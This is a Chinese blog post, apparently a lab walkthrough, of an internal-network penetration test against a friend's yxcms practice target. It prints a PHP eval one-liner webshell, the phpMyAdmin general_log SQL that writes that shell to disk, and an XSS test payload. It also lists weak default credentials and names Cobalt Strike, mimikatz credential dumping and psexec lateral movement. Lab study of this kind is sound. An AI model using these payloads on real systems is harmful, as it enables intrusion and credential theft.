前言

最近再学内网渗透，准备把涉及内网的基本渗透流程学习学习，正好好友搭建了一个内网靶场，于是我就借着他的平台练习一下，下面来给大家总结一下我渗透的过程。希望能帮助大家。

网站漏洞

渗透的话我们首先一步是进行外网打点，好友只给了我们一个IP，进入之后的页面是这样的：

XRAY漏洞扫描工具扫描网站发现备份源码beifen.rar，我们分析源码找到CMS网站yxcms,开始我们的渗透测试。

http://vps/yxcms/

敏感信息泄露 弱口令

在遍历网站信息时，我们发现了后台管理的URL地址

/index.php?r=admin

尝试使用抓包工具BURPSUITE进行密码爆破，成功后得到密码：

admin/123456

PhpMyAdmin弱口令

扫目录发现/phpmyadmin管理系统,我们还是尝试爆破弱口令，得到PHPMYADMIN管理系统密码：

root/root

yxcms功能点 留言本 存在存储型XSS漏洞

在浏览网站结构时，发现留言板页面，通常留言板会存在XSS漏洞，我们尝试一下：

test<script>alert(45)</script>

成功弹窗，说明可以利用，之后可以利用这个漏洞获取管理员cookie等信息。

后台任意文件读写漏洞

前面已知管理员账号密码，于是我们进入后台，发现存在前台模板，我们可以新建模板来传入一句话木马。

<?php eval($_POST[XINO]);?> 

因为我们之前下载了源码，代码审计后发现文件保存路径为

yxcms/protected/apps/default/view/default/xino.php

可以连接菜刀蚁剑。

PhpMyAdmin 开启全局日志getshell

参考：" INTO OUTFILE '/网站绝对路径/shell.php' 2.高版本Mysql" href="https://www.cnblogs.com/fzblog/p/13912387.html#:~:text=二.Phpmyadmin拿shell的两种方法 1.低版本Mysql Mysql低于5.0，可以直接通过outfile写入： SELECT "" INTO OUTFILE '/网站绝对路径/shell.php' 2.高版本Mysql" target="_blank" rel="nofollow noopener noreferrer">phpMyAdmin拿shell的两种方法 - -冰封 - 博客园 (cnblogs.com)

首先判断secure_file_priv是否为空

show variables like '%secure%'

查询日志保存状态

show variables like '%general%'

开启全局日志并修改日志保存位置为C:/phpStudy/WWW/hack.php

set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/hack.php';

执行sql查询语句并在里面包含一句话木马，一句话木马将写入到日志文件hack.php中

Select '<?php eval($_REQUEST[xino]);?>'

蚁剑连接成功。

主机上线cs

靶机为windows系统，因此用cs生成一个windows可执行木马。

使用蚁剑上传并执行

可以在cs上看到主机成功上线，当然不止这一种方式，只是列了其中一种。

后渗透阶段

win7信息收集

使用命令ipconfig发现存在内网网卡

使用命令查看域信息

net config Workstation

接下来探测主机：

net view（需提权至system，执行此命令后所有探测到的主机将在目标列表中显示）

其中OWA为域控，ROOT-XXX为域成员

提权

使用cs内置模块进行提权

成功后将上线一个system权限的会话

获取明文密码

1.通过msf的hashdump等模块

2.使用mimikatz或者cs中的mimikatz模块

这里用cs中自带的

横向移动

有了域管理员账号后，可以使用该域管理员账号密码利用 psexec 登录域内任何一台开启了admin$共享(该共享默认开启) 的主机。

在此之前需要创建一个smb监听器：

成功后域控主机将出现在会话列表,使用同样的方法可以控制域成员。

结语

作为该系列最简单的靶场渗透过程还是比较顺利的，以后会给大家带来其他靶场的渗透流程供大家参考，有兴趣的小伙伴可以自己去试一试，喜欢本文的朋友不妨一键三连。

这篇好文章是转载于：学新通技术网